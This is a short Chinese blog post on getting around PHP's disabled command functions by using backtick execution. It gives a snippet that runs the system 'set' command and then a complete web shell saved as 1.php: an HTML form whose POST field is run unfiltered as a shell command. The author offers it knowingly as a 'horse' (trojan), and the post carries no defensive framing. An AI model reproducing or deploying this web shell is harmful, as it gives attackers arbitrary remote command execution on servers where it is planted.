绕过PHP执行命令的函数执行系统cmd命令

1
2
3
4
<?php
$evil=`set`;
echo '<pre>'.$evil.'</pre>';
?>

  

 

成功执行set命令,你懂的!

顺手写了个php执行cmd命令的马,保存为1.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
<form action="1.php" method="post">
    <input type="text" name="html" placeholder="">
    <input type="submit" name="submit" value="fuck">
</form>
</body>
</html>
<?php
$str=$_POST['html'];
$html=`$str`;
echo $html;
?>

  

 

 

posted @   华中第一黑  阅读(185)  评论(0编辑  收藏  举报
编辑推荐:
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示